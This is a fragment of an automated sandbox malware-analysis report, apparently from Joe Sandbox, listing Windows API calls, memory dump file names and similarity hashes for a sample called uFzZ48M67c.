                                          APIs
                                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441C2A
                                          • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00441C3D
                                            • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: FindMessagePostSleepWindow
                                          • String ID: Shell_TrayWnd
                                          • API String ID: 529655941-2988720461
                                          • Opcode ID: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
                                          • Instruction ID: e91d5bd0f3095d95abf168919443ed1e5ef8457e9bc9ee6dadeb2d3358a759b2
                                          • Opcode Fuzzy Hash: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
                                          • Instruction Fuzzy Hash: 61D0A772B843017BFA6077745D0FF8B66145B14711F000C3A7B46A61C1D4F8D4018758
                                          APIs
                                          • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 004370D1
                                            • Part of subcall function 004118DA: _doexit.LIBCMT ref: 004118E6
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: Message_doexit
                                          • String ID: AutoIt$Error allocating memory.
                                          • API String ID: 1993061046-4017498283
                                          • Opcode ID: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
                                          • Instruction ID: aa36ec6b1cc278624b5c670a1a0522bf80bf1016c56dd6686bcadf549e8ac499
                                          • Opcode Fuzzy Hash: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
                                          • Instruction Fuzzy Hash: F1B092323C030627E50437910D0BF9D26003B64F02F220C067324280D204C90090131D